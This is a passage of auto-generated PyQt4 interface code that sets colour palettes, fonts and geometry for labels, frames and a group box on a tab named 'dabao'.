brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label_3.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label_3.setFont(font)
self.label_3.setObjectName(_fromUtf8("label_3"))
self.tabWidget.addTab(self.index, _fromUtf8(""))
self.dabao = QtGui.QWidget()
self.dabao.setObjectName(_fromUtf8("dabao"))
self.groupBox = QtGui.QGroupBox(self.dabao)
self.groupBox.setGeometry(QtCore.QRect(20, 30, 811, 511))
font = QtGui.QFont()
font.setPointSize(20)
font.setBold(True)
font.setItalic(True)
font.setUnderline(False)
font.setWeight(75)
font.setStrikeOut(False)
self.groupBox.setFont(font)
self.groupBox.setObjectName(_fromUtf8("groupBox"))
self.frame = QtGui.QFrame(self.groupBox)
self.frame.setGeometry(QtCore.QRect(40, 90, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 231, 158))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 231, 158))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 239, 189))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 223, 125))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 138, 40))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 103, 30))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 207, 61))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame.setPalette(palette)
self.frame.setAutoFillBackground(True)
self.frame.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame.setFrameShadow(QtGui.QFrame.Raised)
self.frame.setObjectName(_fromUtf8("frame"))
self.label = QtGui.QLabel(self.frame)
self.label.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label.setFont(font)
self.label.setObjectName(_fromUtf8("label"))
self.frame_2 = QtGui.QFrame(self.groupBox)
self.frame_2.setGeometry(QtCore.QRect(290, 90, 201, 181))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 170, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 127, 63))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 56, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 42, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
